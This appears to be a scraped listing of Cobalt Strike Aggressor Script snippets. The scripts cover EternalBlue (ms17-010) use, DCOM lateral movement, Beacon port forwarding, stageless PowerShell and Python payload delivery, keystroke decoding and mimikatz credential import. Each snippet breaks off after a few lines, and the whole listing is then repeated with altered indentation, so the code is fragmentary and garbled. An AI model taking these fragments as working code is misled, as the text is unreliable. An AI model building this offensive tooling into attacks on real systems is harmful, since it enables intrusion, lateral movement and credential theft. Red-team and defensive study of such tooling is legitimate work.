Raphael rsmudge

## eternalblue.cna
#
# script to help move around with ms17-010 from Metasploit
# Go to Attacks -> Eternal Blue
#

# target, listener, where to save .rc file
sub generate_rc_file {
	local('$target $listener $where $handle $shellcode');
	($target, $listener, $where) = @_;

## initial.cna
#
# Demonstrate how to queue tasks to execute with each checkin...
#

#
# yield tells a function to pause and return a value. The next time the same instance of the
# function is called, it will resume after where it last yielded.
#
sub stuffToDo {
	# Tasks for first checkin

## comexec.cna
# Lateral Movement alias
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

# register help for our alias
beacon_command_register("com-exec", "lateral movement with DCOM",
	"Synopsis: com-exec [target] [listener]\n\n" .
	"Run a payload on a target via DCOM MMC20.Application Object");

# here's our alias to collect our arguments
alias com-exec {

## mouse.cna
# demonstrate how to add a popup handler to a Swing component in Sleep

import java.awt.*;

import javax.swing.*;
import javax.swing.event.*;

# safely add a listener to show a popup
sub setupPopupMenu {
	# we're using fork({}) to run this in a separate Aggressor Script environment.

## portfwd.cna
#
# port foreward alias in Beacon and SSH
#

# pull common code into a function
sub _portfwd {
	if ($2 eq "stop") {
		btask($1, "Tasked session to stop forward to $3");
		call("beacons.pivot_stop_port", $null, $3);
	}

## search.cna
# search for and reproduce output that matches a specific regex.
alias search {
	local('$regex $regex2 $entry $event $bid $out $when');

	# take all of the args, without processing/parsing as normal.
	if (strlen($0) > 7) {
		$regex = substr($0, 7);
	}
	else {
		berror($1, "search [regex]");

## stagelessweb.cna
# Scripted Web Delivery (Stageless)
#
# This script demonstrates some of the new APIs in Cobalt Strike 3.7.

# setup our stageless PowerShell Web Delivery attack
sub setup_attack {
	local('%options $script $url $arch');
	%options = $3;

	# get the arch right.

## webkeystrokes.cna
# convert comma separated keystroke values into a string.
sub toString {
	local('@temp');
	@temp = split(",", $1);
	shift(@temp);

	return join("", map({
		return chr(parseNumber($1, 16, 10));
	}, @temp));
}

## mkimport.cna
# import mimikatz creds from a file.

# go to View -> Script Console
# load this script
# type importcreds /path/to/file.txt

sub process {
	if ($luser eq "(null)" || $luser eq "") {
		return;
	}

## stagelesspython.cna
# Python Stageless Scripted Web Delivery

# setup our stageless Python Web Delivery attack
sub setup_attack {
	local('%options $x86payload $x64payload $url $script');
	%options = $3;

	# generate our stageless x86 payload
	artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
	yield;
	#
	# script to help move around with ms17-010 from Metasploit
	# Go to Attacks -> Eternal Blue
	#

	# target, listener, where to save .rc file
	sub generate_rc_file {
	local('$target $listener $where $handle $shellcode');
	($target, $listener, $where) = @_;
	#
	# Demonstrate how to queue tasks to execute with each checkin...
	#

	#
	# yield tells a function to pause and return a value. The next time the same instance of the
	# function is called, it will resume after where it last yielded.
	#
	sub stuffToDo {
	# Tasks for first checkin
	# Lateral Movement alias
	# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

	# register help for our alias
	beacon_command_register("com-exec", "lateral movement with DCOM",
	"Synopsis: com-exec [target] [listener]\n\n" .
	"Run a payload on a target via DCOM MMC20.Application Object");

	# here's our alias to collect our arguments
	alias com-exec {
	# demonstrate how to add a popup handler to a Swing component in Sleep

	import java.awt.*;

	import javax.swing.*;
	import javax.swing.event.*;

	# safely add a listener to show a popup
	sub setupPopupMenu {
	# we're using fork({}) to run this in a separate Aggressor Script environment.
	#
	# port foreward alias in Beacon and SSH
	#

	# pull common code into a function
	sub _portfwd {
	if ($2 eq "stop") {
	btask($1, "Tasked session to stop forward to $3");
	call("beacons.pivot_stop_port", $null, $3);
	}
	# search for and reproduce output that matches a specific regex.
	alias search {
	local('$regex $regex2 $entry $event $bid $out $when');

	# take all of the args, without processing/parsing as normal.
	if (strlen($0) > 7) {
	$regex = substr($0, 7);
	}
	else {
	berror($1, "search [regex]");
	# Scripted Web Delivery (Stageless)
	#
	# This script demonstrates some of the new APIs in Cobalt Strike 3.7.

	# setup our stageless PowerShell Web Delivery attack
	sub setup_attack {
	local('%options $script $url $arch');
	%options = $3;

	# get the arch right.
	# convert comma separated keystroke values into a string.
	sub toString {
	local('@temp');
	@temp = split(",", $1);
	shift(@temp);

	return join("", map({
	return chr(parseNumber($1, 16, 10));
	}, @temp));
	}
	# import mimikatz creds from a file.

	# go to View -> Script Console
	# load this script
	# type importcreds /path/to/file.txt

	sub process {
	if ($luser eq "(null)" \|\| $luser eq "") {
	return;
	}
	# Python Stageless Scripted Web Delivery

	# setup our stageless Python Web Delivery attack
	sub setup_attack {
	local('%options $x86payload $x64payload $url $script');
	%options = $3;

	# generate our stageless x86 payload
	artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
	yield;